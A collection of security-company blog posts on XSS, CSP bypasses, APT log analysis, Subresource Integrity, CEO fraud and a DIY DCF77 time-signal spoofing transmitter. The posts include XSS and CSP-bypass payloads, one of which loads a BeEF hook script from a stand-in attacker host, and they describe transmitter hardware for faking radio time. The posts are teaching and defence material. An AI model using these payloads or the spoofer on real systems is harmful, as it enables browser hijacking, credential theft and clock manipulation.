Cross-Site Scripting

Cross-Site Scripting is harmless? Think again!

Cross-Site Scripting, oftentimes referred to as “XSS”, is a common vulnerability of web applications. This vulnerability refers to the incorrect behavior of a web application to insufficiently encode user provided data when displaying it back to the user. If this is the case, attackers are able to inject malicious code, for instance JavaScript, into the affected website.

xssOne of our main tasks at Compass Security is testing web applications for security issues. Thus, we can safely say that many current web applications are affected by this type of vulnerability, even though protecting against it is simple. For simplicity reasons, XSS is usually depicted as a popup window displaying simple text.

Such a popup would be induced by the following code:

<script>alert(0)</script>

The entire attack would look as follows, given that the parameter param is vulnerable. Assume that the following code is used by a web application without employing output encoding:

<input type="text" name="param" value="user_input">

Here, user_input is the non-output encoded data provided by the user.

Then, an attacker can exploit this by setting param to

“><script>alert(0)</script><!–

which will lead to the following being sent to the user:

<input type=”text” name=”param” value=”“><script>alert(0)</script><!–“>

resulting in the above popup being displayed.

When discussing XSS with customers, one of the more common statements we hear is: “this issue is harmless; it only displays text in a popup window”. This is not true, however, since XSS is far more powerful than often suspected. It allows an attacker to take full control over the victim’s browser. The victim, in this case, is the user who visits the attacked website. Common attack vectors include the victim’s session cookie being stolen, if it is not protected by the so-called HttpOnly flag. Further, the affected website can be manipulated so that the user is redirected to a Phishing website, allowing the attacker to obtain the user’s credentials. Finally, if the victim’s browser is outdated and contains known vulnerabilities, these can directly be exploited via Cross-Site Scripting and, if successful, lead to the victim’s computer being compromised.

beefMany of the above-mentioned attack vectors can be very easily tested using the BeEF (Browser Exploitation Framework) Framework (http://beefproject.com/). This framework provides many attack vectors that can be used by including just one malicious JavaScript file into the vulnerable website. Hence, instead of the above code (“><script>alert(0)</script><!–), the following would be injected:

“><script src=http://attacker.com/hook.js></script><!–

where attacker.com is an attacker-controlled website and hook.js is the malicious JavaScript file that will allow the BeEF server on the attacker’s machine to take control over the victim’s browser.

Once the victim’s browser executes the injected JavaScript, it is “hooked”, that is, in the attacker’s control, allowing them to obtain all kinds of information such as the user’s cookies, browser type and version, etc.:

beef_hook

Among many different types of attack vectors, BeEF allows, e.g., displaying a password prompt to the user (in the user’s browser):

beef_password_alertOnce the user entered their password, it is sent to the attacker:

beef_password_resultHow to protect against such attacks?

Simple! Just encode user-provided data before echoing it back to the user. An effective method is to use HTML entities:
is encoded as &quot;,
< is encoded as &lt;,
and so forth (for a detailed explanation, refer to https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).

If you want to see this any many more typical web application vulnerabilities, try them out yourself, and learn how to defend against them, register for our next Web Application Security course:

https://www.compass-security.com/services/security-trainings/

The Web Application Security (Basic/Advanced) courses will introduce all major web application attack vectors via theory and hands-on challenges in our Hacking-Lab:

https://www.hacking-lab.com/

Content-Security-Policy: misconfigurations and bypasses

Introduction

The Content Security Policy (CSP) is a security mechanism web applications can use to reduce the risk of attacks based on XSS, code injection or clickjacking. Using different directives it is possible to lock down web applications by implementing a whitelist of trusted sources from which web resources like JavaScript may be loaded. Currently the CSP version 2 is supported by Firefox, Google Chrome, and Opera, whereas other browsers provide limited support or no support at all (Internet Explorer)[4].

The CSP has two modes of operation [7]: enforcing and report-only. The first one can be used to block and report attacks whereas the second one is used only to report abuses to a specific reporting server. In this blog post, we will focus only on the enforcing mode.

The policy, in order to work, has to be included in each HTTP response as a header (“Content-Security-Policy:”). The browser will then parse the CSP and check if every object loaded in the page adheres to the given policy. To specify these rules, the CSP provides different directives [5]:

  • script-src: defines valid sources of JavaScript
  • object-src: defines valid sources of plugins, like <objects>
  • img-src: defines valid sources of images
  • style-src: defines valid source of stylesheets
  • report-uri: the browser will POST a report to this URI in case of policy violation

Each of these directives must have a value assigned, which is usually a list of websites allowed to load resources from. The default behavior of directives if omitted, is to allow everything (“*”) without restrictions [9]. A basic example of a valid CSP is shown below:

Content-Security-Policy: default-src 'self'; script-src compass-security.com

The directive “default-src” is set to ‘self’, which means same origin. All resources without a directive set are allowed to be loaded only from the same origin, in this case “blog.compass-security.com”. Setting the “default-src” directive can be a good start to deploy your CSP as it provides a basic level of protection. “script-src” is used to allow all JavaScripts to be loaded from the domain “compass-security.com”, via HTTP (https:// should be explicitly specified) without allowing subdomains. These could be specified directly (e.g. sub.compass-security.com) or using the “*” wildcard (*.compass-security.com)

Misconfigurations and Bypasses

Even though it is possible to have a good level of control over the policy, errors in the definition of directives may lead to unexpected consequences. Misconfiguration or ambiguities can render the policy less efficient or easy to bypass. In addition, the functionality of the application could also be broken. The following example illustrates what can happen if “default-src” is omitted:

Content-Security-Policy: script-src compass-security.com

Now, all the scripts with source “compass-security.com” are allowed. But what about the other objects like stylesheets or flash applets? The policy above can be bypassed for example using this payload, which triggers an alert box using a Flash object[7]:

">'><object type="application/x-shockwave-flash" 
data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/
assets/charts.swf?allowedDomain=\"})))}catch(e{alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

One other common mistake is the inclusion of the dangerous “unsafe-inline” or “unsafe-eval” directives. These allow the execution of potentially malicious JavaScript directly via “<script>” tags or eval():

Content-Security-Policy: default-src 'self'; script-src compass-security.com 'unsafe-inline';

This policy defines the default source as “self” and allows the execution of script from “compass-security.com” but, at the same time, it allows the execution of inline scripts. This means that the policy can be bypassed with the following payload [7]:

">'><script>alert(1337)</script>

The browser will then parse the JavaScript and execute the injected malicious content.

Besides these trivial misconfigurations shown above, there are some other tricks used to bypass CSP that are less common and known. These make use, for example, of JSONP (JSON with padding) or open redirects. Let’s take a look at JSONP bypasses.

If the CSP defines a whitelisted JSONP endpoint, it is possible to take advantage of the callback parameter to bypass the CSP. Assuming that the policy is defined as follows:

Content-Security-Policy: script-src 'self' https://compass-security.com;

The domain compass-security.com hosts a JSONP endpoint, which can be called with the following URL:

https://compass-security.com/jsonp?callback={functionName}

Now, what happens if the {functionName} parameter contains a valid JavaScript code which could be potentially executed? The following payload represents a valid bypass [7]:

">'><script src="https://compass-security.com/jsonp?callback=alert(1);u">

The JSONP endpoint will then parse the callback parameter, generating the following response:

Alert(1); u({……})

The JavaScript before the semicolon, alert(1), will be executed by the client when processing the response received.

URLs with open redirects could also pose problems if whitelisted in the CSP. Imagine if the policy is set to be very restrictive, allowing only one specific file and domain in its “script-src” directive:

Content-Security-Policy: default-src: 'self'; script-src https://compass-security.com/myfile.js https://redirect.compass-security.com

At first sight, this policy seems to be very restrictive: only the myfile.js can be loaded along with all the scripts originating from “redirect.compass-security.com” which is a site we trust. However, redirect.compass-security.com performs open redirects through a parameter in the URL. This could be a possible option to bypass the policy [7]:

">'><script src="https://redirect.compass-security.com/redirect?url=https%3A//evilwebsite.com/jsonp%2Fcallback%3Dalert">

Why is it possible to bypass the CSP using this payload? The CSP does not check the landing page after a redirect occurs and, as the source of the script tag “https://redirect.compass-security.com” is whitelisted, no policy violation will be triggered.

These are only a small subset of possible CSP bypasses. If you are interested, many of them can be found at [6] or [7].

The “nonce” directive

Besides the whitelist mechanism using URLs, in the CSP2 there are other techniques that can be used to block code injection attacks. One of these is represented for example by “nonces”.

Nonces are randomly generated numbers that should be defined in the CSP and included only inside <script> or <style> tags to identify resources and provide a mapping between the policy and the client’s browser. An attacker injecting a payload containing a script tag has no knowledge of the nonce previously exchanged between the client and the server, resulting in the CSP detecting this and throwing a policy violation. A possible configuration of a CSP with nonces could be:

Content-Security-Policy: script-src 'nonce-eED8tYJI79FHlBgg12'

The value of the nonce (which should be random, unpredictable, generated with every response, and at least 128 bits long [10]) is “eED8tYJI79FHlBgg12”.

This value should be then passed to each script tag included in our application’s pages:

<script src="http://source/script.js" nonce="eED8tYJI79FHlBgg12">

The browser will then parse the CSP, check if the scripts included have a matching value and block those that do not include any valid nonce. This technique works great against stored XSS, as the attacker cannot include valid nonces at injection time. Another advantage is that there is no need to maintain whitelists of allowed URLs, as the nonce acts as an access token for the <script> tag and not necessarily for the source of the script. It is also possible to use hashes in order to identify the content of each <script> element inside the page, more information about this feature can be found at [8].

Conclusion

We have seen that the CSP is a very useful tool web developers can use to have better control on the loaded resources. The different directives provide flexibility to allow or deny potentially dangerous web resources inside web pages. However, it is also easy to make errors if too many URLs are whitelisted (e.g. hidden JSONP endpoints). Here at Compass we encourage the use of the CSP as an additional barrier against web threats. Nonetheless, I would like to stress that the first protection against code injection should always be provided by a solid input/output validation, which can help also against other common attacks like SQL injections.

If you would like to get more information about how web applications should be protected, or you want to deepen your web security knowledge we provide different trainings:

We are also offering trainings in other areas of IT Security. You can check the different topics here:

Sources & References

  1. https://www.owasp.org/index.php/Content_Security_Policy
  2. https://www.w3.org/TR/CSP2/#intro
  3. https://w3c.github.io/webappsec-csp/#match-element-to-source-list
  4. http://caniuse.com/#search=Content%20Security%20Policy%20Level%202
  5. http://content-security-policy.com/
  6. https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it’s-CSP!%22.
  7. http://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
  8. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
  9. http://www.html5rocks.com/en/tutorials/security/content-security-policy/
  10. https://www.w3.org/TR/CSP/#source_list

APT Detection & Network Analysis

Until recently, the majority of organizations believed that they do not have to worry about targeted attacks, because they consider themselves to be “flying under the radar”. The common belief has been: “We are too small, only big organizations like financial service providers, military industry, energy suppliers and government institutions are affected”.

However, this assumption has been proven wrong since at least the detection of Operation ShadyRAT[0], DarkHotel[1] or the recent “RUAG Cyber Espionage Case”[2]. The analysis of the Command & Control (C&C) servers of ShadyRAT revealed that a large-scale operation was run from 2006 to 2011. During this operation 71 organizations (private and public) were targeted and spied on. It is assumed that these so-called Advanced Persistent Threats (APT) will even increase in the near future.

We at Compass Security are often asked to help finding malicious actions or traffic inside corporate networks.

The infection, in most cases, is a mix of social engineering methods (for example spear phishing) and the exploitation of vulnerabilities. This actually varies from case to case. Often we observe in proxy logs, that employees were lured into visiting some phishing sites which are designed to look exactly like the corporation’s Outlook Web Access (OWA) or similar applications/services as being used by the targeted company.

Typically, this is not something you can prevent exclusively with technical measures – user awareness is the key here! Nevertheless, we are often called to investigate when there still is some malware activity in the network. APT traffic detection can then be achieved with the correlation of DNS, mail, proxy, and firewall logs.

Network Analysis & APT Detection

To analyze a network, Compass Analysts first have to know the network’s topology to get an idea of how malware (or a human attacker) might communicate with external servers. Almost every attacker is going to exfiltrate data at some point in time. This is the nature of corporate/industrial espionage. Further, it is important to find out whether the attacker gained access to other clients or servers in the network.

For the analysis, log files are crucial. Many companies are already collecting logs on central servers [3], which speeds up the investigation process, since administrators don’t have to collect the logs from many different sources (which sometimes takes weeks), and off-site logs are more difficult to clear by attackers.

To analyze logs and sometimes traffic dumps, we use different tools like:

ELK offers many advantages when it comes to clustering and configuration, but it doesn’t offer many pre-configured log parser rules. If you are lucky, you can find some for your infrastructure on GrokBase[4]. Otherwise there are plenty of tools helping you to build them on your own, such as e.g. Grok Debugger[5].

However, when analysis has to be kick-started fast, and you do not have time to configure large rulesets – Splunk comes with a wide range of pre-configured parsers.

After we gathered all logs (and in some cases traffic dumps), we feed them into Splunk/ELK/Moloch for indexing.

In a first step we try to clean the data set by removing noise. To achieve this, we identify known good traffic patterns and exclude them. Of course it is not always straight forward to distinguish between normal and suspicious traffic as some malware uses for example Google Docs for exfiltration. It takes some time to understand what the usual traffic in a network looks like. To clean the data set even more, we then look for connections to known malware domains.

There are plenty of lists available for this:

If we are lucky, the attacker used infrastructure provided by known malware service providers (individuals and organizations are selling special services just for the purpose of hosting malware infrastructure). But more sophisticated attacks will most likely use their own infrastructure.

After cleaning out the data sets, we look for anomalies in the logs (e.g. large amounts of requests, single requests, big DNS queries, etc.). Some malware is really noisy and as a consequence, easy to find. Some samples are connecting to their C&C servers in a high frequency. Other samples are requesting commands form C&C servers at regular time intervals (Friday 20:00 for example). Others connect just once.

Sometimes we also detect anomalies in the network infrastructure which are caused by employees, for example heavy usage of cloud services such as Google Drive or Dropbox. Often these constitute to so-called false positives.

To share our experiences and knowledge in this field, we created the Security Training: Network Analysis & APT.

This training will cover:

  • Configuration of evidence (What logs are needed?)
  • Static and Dynamic Log Analysis with Splunk
    • Splunk Basics and Advanced Usage
    • Detecting anomalies
    • Detecting malicious traffic
  • Attack & Detection Challenges

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-network-anlysis-apt/ or get in touch if you have questions.

The next upcoming training is on 22. and 23. September 2016 in Jona, click here to register.

Sources & References:
[0] Operation Shady RAT, McAfee, http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
[1] The Darkhotel APT, Kaspersky Lab Research, https://securelist.com/blog/research/66779/the-darkhotel-apt/
[2] Technical Report about the Malware used in the Cyberespionage against RUAG, MELANI/GovCERT, https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html
[3] “Challenges in Log-Management”, Compass Security Blog, http://blog.csnc.ch/2014/10/challenges-in-log-management/
[4] GrokBase, http://grokbase.com/
[5] Grok Debugger, https://grokdebug.herokuapp.com/
[x.0] APT Network Analysis with Splunk, Compass Security, Lukas Reschke, https://www.compass-security.com/fileadmin/Datein/Research/White_Papers/apt_network_analysis_w_splunk_whitepaper.pdf
[x.1] Whitepaper: Using Splunk To Detect DNS Tunneling, Steve Jaworski, https://www.sans.org/reading-room/whitepapers/malicious/splunk-detect-dns-tunneling-37022

Windows Phone – Security State of the Art?

Compass Security recently presented its Windows Phone and Windows 10 Mobile research at the April 2016 Security Interest Group Switzerland (SIGS) event in Zurich.

The short presentation highlights the attempts made by our Security Analysts to bypass the security controls provided by the platform and further explains why bypassing them is not a trivial undertaking.

Windows 10 Mobile, which has just been publicly released on 17th March 2016, has further tightened its hardware-based security defenses, introducing multiple layers of protection starting already at boot time of the platform. Minimum hardware requirements therefore include the requirement for UEFI Secure Boot support and a Trusted Platform Module (TPM) conforming to the 2.0 specification. When connected to a MDM solution the device can use the TPM for the new health attestation service to provide conditional access to the company network, its resources and to trigger corrective measures when required.

Compared to earlier Windows Phone versions, Windows 10 Mobile finally allows end-users without access to an MDM solution or ActiveSync support to enable full disk encryption based on Microsoft BitLocker technology. Companies using an MDM solution also have fine grained control over the used encryption method and cipher strength. Similar control can be applied to TLS cipher suites and algorithms.

Newly introduced features also include the biometric authentication using Windows Hello (selected premium devices only for the moment) or the Enterprise Data Protection (EDP) which helps separating personal and enterprise data and serves as a data loss protection solution. EDP requires the Windows 10 Mobile Enterprise edition and is currently available to a restricted audience for testing purposes.

Similar to Windows 10 for workstations the Mobile edition automatically updates. Users of the Windows 10 Mobile Enterprise edition however have the option to postpone the downloading and installation of updates.

In addition the presentation introduces the Windows Bridges that will help developers to port existing mobile applications to the new platform. While a preview version for iOS (Objective C) has been made publicly available, Microsoft recently announced that the Windows Bridges for Android project has been cancelled. In the same week Microsoft announced the acquisition of Xamarin, a cross-platform development solution provider to ease the development of universal applications for the mobile platform.

The slides of the full presentation can be downloaded here.

References:

This blog post resulted from internal research which has been conducted by Alexandre Herzog and Cyrill Bannwart.

Compass Security nominated by Prix SVC

Compass Security proudly announces its nomination for the Prix SVC (Swiss Venture Club) award 2016. Out of 180 companies, Compass Security was selected as one of the most innovative companies in the eastern region of Switzerland. Because the award ceremony is being broadcasted by TVO, we had to slip into a tuxedo and play the “license to hack” story. Please watch the teaser video on YouTube!

spr_butScreen Shot 2016-02-17 at 12.04.07

The award ceremony will be held on March 10th, 2016 at the Olma Hallen in St. Gallen. We don’t yet know the final score but we will keep you updated.

Thank you for the trust and confidence you have in Compass Security!!

Walter & Ivan

 

Presentation on SAML 2.0 Security Research

Compass Security invested quite some time last year in researching the security of single sign-on (SSO) implementations. Often SAML (Security Assertion Markup Language) is used to implement a cross-domain SSO solution. The correct implementation and configuration is crucial for a secure authentication solution. As discussed in earlier blog articles, Compass Security identified vulnerabilities in SAML implementations with the SAML Burp Extension (SAML Raider) developed by Compass Security and Emanuel Duss.

Antoine Neuenschwander and Roland Bischofberger are happy to present their research results and SAML Raider during the upcoming

Beer-Talks:
– January 14, 2016, 18-19 PM, Jona
– January 21, 2016, 18-19 PM, Bern

Free entrance, food and beverage. Registration required.

Get more information in our Beer-Talk page and spread the word. The Compass Crew is looking forward to meeting you.

Subresource Integrity HTML Attribute

Websites nowadays are mostly built with different resources from other origins. For example, many sites include scripts or stylesheets like jQuery or Bootstrap from a Content Delivery Network (CDN). This induces that the webmasters implicitly trust the linked external sources. But what if an attacker can force the user to load the content from an attacker controlled server instead of the genuine resource (e.g. by DNS poisoning, or by replacing files on a CDN)? A security-aware webmaster had no chance to protect his website against such an incident.

This is the point where Subresource Integrity kicks in. Subresource Integrity ensures the integrity of external resources with an additional attribute for the two HTML tags <link> and <script>. The integrity attribute contains a cryptographic hash of the external resource which should be integrated in the site. The browser then checks if the hash of the fetched resource and the hash in the HTML attribute are identical.

Bootstrap example:

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs8" crossorigin="anonymous">

In the example above, resource bootstrap.min.css is checked for its integrity with its Base64 encoded SHA-384 hash. If the integrity check is positive, the browser applies the stylesheet (or executes the script in the case of a <script> tag). If the check fails, the browser must refuse to apply the stylesheet or execute the script. The user is not informed if the check has failed and a resource therefore could not be loaded. The failed request can only be seen in the developer tools of the used browser. The following image shows the error message in the Chrome developer tools.

Console in browser does inform about subresource integrity check fail.

Console in browser does inform about subresource integrity check fail.

The crossorigin attribute in the example configures the CORS request. A value anonymous indicates, that requests for this element will not have set the credentials flag and therefore no cookies would be sent. A value of use-credentials would indicate, that the request will provide cookies to authenticate.

The subresource integrity attribute is currently being reviewed before becoming a W3C standard but is already supported by Chrome 45≤ , Firefox 43≤ and Opera 32≤.

Concluding, the subresource integrity attribute offers better possibilities for webmasters to ensure the integrity of external resources. However, this attribute is not supported by older browsers and needs to be adjusted at every resource change. In the end, a security aware webmaster will keep more control with less effort by keeping all resources hosted on his own servers.

Come’n’Hack Day 2015

Being a security analyst at Compass Security is an interesting thing, no doubt. Besides interesting projects, there is plenty of know-how transfer and interactions between the employees. For example, each year, all security analysts come together for an event called Come’n’Hack Day. During this year’s event, they had the pleasure to perform an attack/defense hacking contest against each other.

IMG_1447

Hacking-Lab‘s new Capture The Flag (CTF) system was used for this purpose. It was only the second time this system was used for an event, after the premiere at the European Cyber Security Challenge final last October in Lucerne.

IMG_6058

The participants were spread on three teams: Proxy Foxes, Lucky Bucks and Chunky Monkeys. Each team owned servers with running applications, and had different tasks to perform in order to get points:

  • ATTACK – Attack the other team’s applications, and steal a gold nugget.
  • DEFENSE – Protect its own applications.
  • CODE-PATCHING – Find and patch vulnerabilities in its own applications.
  • AVAILABILITY – Keep the own applications up and running.
  • JEOPARDY – Solve hacking challenges (cryptography, networking, etc.).
  • POWNED – Try to exploit the other teams’ servers.

After a hard fight, the Chunky Monkeys grabbed the first place, closely followed by the Lucky Bucks:

scoring

Almost one hundred gold nuggets were stolen during the day:gold_nuggets

All attendees enjoyed the highly eventful day. With six different ways to score points, each participant could contribute to its team’s success. This makes such a CTF occasion not only a great social event idea for security analysts but potentially for any organization having technical skilled employees (IT security officers, sysadmins and/or developers)!

What is a “Fake President Fraud” and how to Protect Your Company

“Fake President Fraud” or “CEO Fraud” is a social engineering attack where an adversary tries to convince a member of the financial department of a company to send out a payment to the attacker’s bank account. The attack can be divided into three steps.

  1. Establish Contact:
    Typically only employees responsible for bank transfers get contacted by the adversary, as they have all needed permissions to execute payments. Therefore the criminal impersonates a CEO or any other superior who has enough authority to arrange urgent payments.
    These kind of social engineering attacks work if the adversary gathers enough information about the individual he wants to impersonate. As most CEO’s are referenced on the world wide web with detailed personal information such as curriculum vitae and email address, it is easy for an attacker to gather everything he needs to fake a CEO email. Furthermore, company websites often disclose information about customers and other useful details which help an adversary to be more convincingly when requesting a payment.
  2. Request Payment Transaction:
    The attacker often uses email (spear phishing) or phone calls (vishing) to contact his target. Whereby a phone call only works if the victim does not know the voice of the impersonated superior, an attack over email has no such restrictions.
    The request itself is about an urgent payment to a foreign bank account and uses a variety of pretexts such as acquisitions or customer projects. For this step to succeed, the criminal uses different elements to convince the target to be compliant to his request and send out the payment:

    1. Authority: Asking the target as an authority adds a strong argument to every request. Jonathan J. Rusch writesPeople are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present.” One of the most impressive experiment in social psychology history, which demonstrated the blind obedience to authority figures, is the Stanley Milgram experiment.
    2. Valorization: The “fact” that the CEO or a superior has “chosen” this specific employee implies that he trusts him. The feeling of being trusted makes the body release oxytocin, often referred as the “love hormone”. This hormones facilitates trust and attachment between individuals. This is an additional factor that helps the attacker to quickly build feelings of rapport and to convince the target to be compliant to his request and send out the payment.
    3. Secrecy: In order to avoid that a target verifies the authenticity and validity of an order, attackers often label the request as “STRICTLY CONFIDENTIAL” or insert statements like “this project is still secret and its success depends on this transaction”.
    4. Pressure: Shifting all the responsibility for the success or failure of a project to the target’s shoulder, the attacker put a lot of pressure on him. This will induce the victim to be more compliant and execute the request.
    5. Urgency: Urgency and authority is a good combination to convince the target to perform the payment as fast as possible. The attacker creates a false sense of urgency in order to get the target to make a rushed judgment or a rash decision. Example email:ceofraud
  3. Transfer Money:
    If the attacker manages to convince the targeted employee to send out the payment, the money gets transferred to the foreign bank’s account.

 

Now the question arises what a company can do to avoid a “Fake President Fraud”. Different organizational and technical steps can be done to mitigate the risk of an incident.

  1. Organizational:
    1. If possible email or phone communication should not be allowed when authorizing large payments. Therefore face-to-face meetings should be mandatory.
    2. Develop and communicate guidelines and processes of how payment transactions need to be handled.
    3. If a transaction does not fit the defined process it should be necessary that the employee asks feedback questions which verify that it is a authorized request.
    4. Employees should participate a special social engineering training to learn how to avoid getting manipulated by an attacker. The goal of the course should be to convey how an attacker thinks, arise a general awareness for social engineering attacks and explain that such attacks are not limited to one communication channel (e.g. email, SMS, WhatsApp, personal).
    5. Only publish as little financial and personal information in social media and company websites as necessairy. This makes it harder for an adversary to prepare his attack.
    6. A two-step (4-eyes) verification process when sending out large amounts of money to foreign bank accounts helps mitigating the damage an attack. It is important that the companies culture is good enough that the second person actually really reviews the payment and can challenge the first person without fears for both of them of being in a “Big Brother” system.
    7. Do not allow employees to use their personal email address for business purpose. This avoids that a compromised private email account allows someone to gain business data access.
  2. Technical:
    1. Do not allow that an email from an external mail server is accepted by your mail server when the email address contains your domain name.
    2. Always use email signatures/encryption at least when sending mails with confidential and/or sensitive content (e.g. S/MIME, PGP).
    3. Mark emails from external mail-servers with a tag inside the subject (e.g. [EXTERNAL]). This should be done when the emails enter the company’s mail server. With conditional formatting mails can be marked in red if the mail originates outside the company.
    4. To avoid an Outlook WebAccess from being hacked and used to perform a CEO Fraud, a strong authentication method should be used in addition of a strong password policy (e.g. client certificates, two factor authentication or access restriction to VPN traffic only).
    5. Attackers may register and use similar looking domains for a CEO fraud attack. To be aware of this, the company should check if there are any similar existing domains (e.g. .co instead of .com top-level domain) and blacklist them on their mail server.
    6. Additionally the company should try to register all similar looking domains to make it harder for an attacker to register a domain for his attack which looks slightly different then the domain of the company.

Even if the described attack is a real threat, exploited by attackers around the world every day, there are some effective steps to mitigate the risk of an incident as shown above. Especially an awareness training where the employee is taught when to be suspiciously and how attackers try to manipulate people is recommended, as this is the best protection against different types of social engineering attacks.

DCF77 Zeitsignal Manipulation

In diesem Artikel wird aufgezeigt, wie einfach das per Funk ausgestrahlte DCF77 Zeitsignal manipuliert werden kann. DCF77 wird in vielen Bereichen eingesetzt in denen eine genaue Uhrzeit benötigt wird: Von der einfachen Armbanduhr bis zur Industrieanlage.

Was ist DCF77

In Europa existiert seit 1959 der Zeit Sender DCF77. Der Sender verfügt über eine Reichweite von 2000km und befindet sich in Mainflingen – Deutschland. Drei Atomuhren dienen als Zeitbasis. Neuere Empfänger setzen teilweise auf GPS anstelle von DCF77, haben jedoch den Nachteil, dass sie eine Aussenantenne für den Empfang benötigen. Lösungen mit einer Internetanbindung hingegen beziehen ihre Zeit üblicherweise über das Netzwerk.

Bild-Quelle: https://de.wikipedia.org/wiki/DCF77#/media/File:Dcf_weite.jpg

DCF77 Reichweiten Karte

Wo wird DCF77 eingesetzt

Die DCF77 Einsatzgebiete sind unter anderem: Kirchturmuhren, Ampelanlagen, Tarifschaltuhren bei Energieversorgungsunternehmen, Industrieumgebungen, Server, öffentlicher Verkehr, Rundfunk oder normale Wecker und Armbanduhren.

Was sind die Folgen einer Zeitmanipulation

Bei einer Manipulation des Weckers des Nachbarn hält sich der entstehende Schaden im Allgemeinen in Grenzen. Im Gegensatz dazu stehen Automationslösungen wie sie z.B. in der Lebensmittel- oder Chemieindustrie vorkommen, bei denen durch falsche Prozesszeiten immense Schäden entstehen können.
Auch im Bereich der IT-Kommunikation können die Auswirkungen wahrgenommen werden z.B. falls Computerzertifikate nach einer Zeitmanipulation ihre Gültigkeit verlieren, da das Gültigkeitsdatum abgelaufen ist. Die verschlüsselte Kommunikation schlägt somit fehl.

DCF77 Sender im Eigenbau

DCF77 Sender sind im Gegensatz zu Empfängern öffentlich kaum erhältlich. Doch wie sieht es aus, wenn man selbst ein DCF77 Signal aussenden möchte? Der Zeitaufwand um selbst ein Sender (Hardware und Software) mit geringer Reichweite zu bauen, ist ähnlich gross wie einen eigenen Empfänger zu bauen. Die benötigten Informationen zum Bau eines Senders (Protokoll, Sendefrequenz, Modulation) sind im Internet leicht zu finden, werden sie doch auch zum Bau eines Empfängers benötigt.

Um die Anfälligkeit von DCF77 Systemen aufzuzeigen, wurde ein kleiner Sender mit einer Reichweite von ca. 30cm gebaut. Für höhere Reichweiten wäre eine grössere Antenne sowie ein Verstärker nötig. Die Umsetzung wäre mit geringem Aufwand möglich, die Aussendung des Signals jedoch illegal.  Mit dem Sender können beliebig manipulierte Zeitinformationen (Datum/Zeit/Wochentag) gesendet werden, die von den DCF77 Uhren, die sich im Empfangsbereich befinden, übernommen werden.

DECEEF77-Sender

DCF77 Piraten Sender – DECEEF77

Projektziel: DCF77 Piratensender mit kurzer Reichweite. Abgebildet ist die selbstentwickelte Hardware und Software DECEEF77 V.1.0. Der zu sendende Zeitstempel kann nach dem Einschalten bzw. Anschluss der mini USB Stromversorgung, über die drei Tasten (+ / Enter / -) eingestellt werden.

Protokoll

Trägerfrequenz 77.5kHz
Modulation Amplituden Modulation
Bitrate 1 Bit pro Sekunde
0.1 Sekunde Trägerabsenkung Logisches 0
0.2 Sekunde Trägerabsenkung Logisches 1
59. Sekunde Keine Trägerabsenkung

Das folgende Bild stellt die Sendeleistung über die Zeit dar. Jede Sekunde wird die Sendeleistung für 0.1 Sekunden (logisches 0) oder 0.2 Sekunden (logisches 1) abgesenkt, bei der 59 Sekunde findet keine Absenkung statt.

DCF77-AM-Modulation

DCF77-AM-Modulation

Der Zeitstempel wird innerhalb einer Minute vollständig übertragen. Im folgenden Kreisdiagramm sind die 59 Bits, die pro Minute übertragen werden, dargestellt. Pro Sekunde wird ein Bit übertragen, welches durch einen Strich auf dem Kreis eingezeichnet ist.

DCF77-Kreisdiagramm

DCF77-Kreisdiagramm

Der Zeitstempel wird in Bit 21 bis 58 codiert. Die mit P1, P2 sowie P3 gekennzeichneten Bits sind jeweils die Parity Bits die zur Validierung der korrekten Übertragung des Signals genutzt werden.

Hardware DECEEF77

  • µC: Atmel ATMEGA328P-PU
  • 16 MHz Quarz Takt
  • 77.5 kHz Rechteck zu Sinus Filter
  • Operationsverstärker als Verstärker für die Antenne.
  • Eine Ferritstabantenne die für den Empfang des DCF77 Signals gedacht ist, wurde verwendet, um das Signal auszusenden.
  • Print-Design mit Altium Designer

Schaltungsbeschreibung

DECEEF77-Schema

DECEEF77-Schema

Der Mikrocontroller U1 teilt den 16MHz Quarz Takt auf 77.5kHz runter. Auf dem Port PB3 wird entweder ein 5V Rechteck mit dem 77.5kHz Signal ausgegeben, oder PB3 wird hochohmig geschaltet. Es wird somit eine 100% Amplitudenmodulation verwendet (volle Leistung oder keine Leistung). Durch R2 und R4 wird bei hochohmigem Ausgang der Pegel auf 2.5V gehoben.

Durch mehrere Tiefpass-Filter (R6 bis R9, C6, C7, C10 und C11) wird das Rechtecksignal in einen Sinus (respektive Sinus ähnlich) umgewandelt.

DECEEF77-Tiefpassfilter

DECEEF77-Tiefpassfilter

Der Operationsverstärker U3 verstärkt das Signal und koppelt es über den Kondensator C9 auf die Antenne.

DECEEF77-Verstaerker

DECEEF77-Verstaerker

Die Schalter S1, S2 und S3 sind direkt an den Mikrocontroller Ports angeschlossen, die als Pull-Up Eingänge konfiguriert sind. Die Schalter dienen dazu die Zeit einzustellen (+, Enter, -).

DECEEF77-Schalter

DECEEF77-Schalter

U2 ist das LCD Display das über ein 4-Bit Interface verfügt.

DECEEF77-Display

DECEEF77-Display

J1 dient als In-Circuit-Programmier-Interface und verwendet das Standard 6-Pin ISP Layout.

DECEEF77-ISP

DECEEF77-ISP

Der Test

Ein DCF77-Wecker wird dazu verwendet, um die Funktion des Senders zu testen. Nach 3 bis 5 Minuten läuft der Wecker synchron mit dem Sender.

DECEEF77_TEST